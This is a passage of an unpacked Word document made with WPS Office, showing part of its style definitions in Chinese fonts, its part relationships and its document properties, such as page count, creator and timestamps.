      <w:rFonts w:ascii="Times New Roman" w:eastAsia="仿宋_GB2312" w:hAnsi="Times New Roman"/>
      <w:i/>
      <w:iCs/>
      <w:color w:val="0f4761"/>
      <w:sz w:val="32"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="style4114">
    <w:name w:val="明显参考1"/>
    <w:basedOn w:val="style65"/>
    <w:next w:val="style4114"/>
    <w:qFormat/>
    <w:uiPriority w:val="32"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
      <w:smallCaps/>
      <w:color w:val="0f4761"/>
      <w:spacing w:val="5"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="style4115">
    <w:name w:val="_Style 23"/>
    <w:next w:val="style4115"/>
    <w:pPr>
      <w:spacing w:after="200" w:lineRule="auto" w:line="276"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="等线" w:cs="宋体" w:eastAsia="等线" w:hAnsi="等线"/>
      <w:sz w:val="22"/>
      <w:szCs w:val="22"/>
      <w:lang w:eastAsia="en-US"/>
    </w:rPr>
  </w:style>
</w:styles>
</file>

<file path=word/_rels/document.xml.rels><?xml version="1.0" encoding="UTF-8"?>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9.png"/><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15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="header5.xml"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer4.xml"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/fontTable" Target="fontTable.xml"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/styles" Target="styles.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image4.png"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="theme/theme1.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image5.png"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/settings" Target="settings.xml"/><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384</TotalTime>
  <Words>1035</Words>
  <Pages>10</Pages>
  <Characters>3381</Characters>
  <Application>WPS Office</Application>
  <DocSecurity>0</DocSecurity>
  <Paragraphs>173</Paragraphs>
  <ScaleCrop>false</ScaleCrop>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>3473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2024-10-10T14:58:00Z</dcterms:created>
  <dc:creator>袁超</dc:creator>
  <lastModifiedBy>V2307A</lastModifiedBy>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-09-18T03:36:09Z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6de7ec6e01974c37996215f83ffa15c3_23</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="4" name="KSOTemplateDocerSaveRecord">
    <vt:lpwstr>eyJoZGlkIjoiMDUwY2Q4YWRlNGQwODc3NDY0NDExMDMxYjRjNjBiMGIifQ==</vt:lpwstr>
  </property>
</Properties>
</file>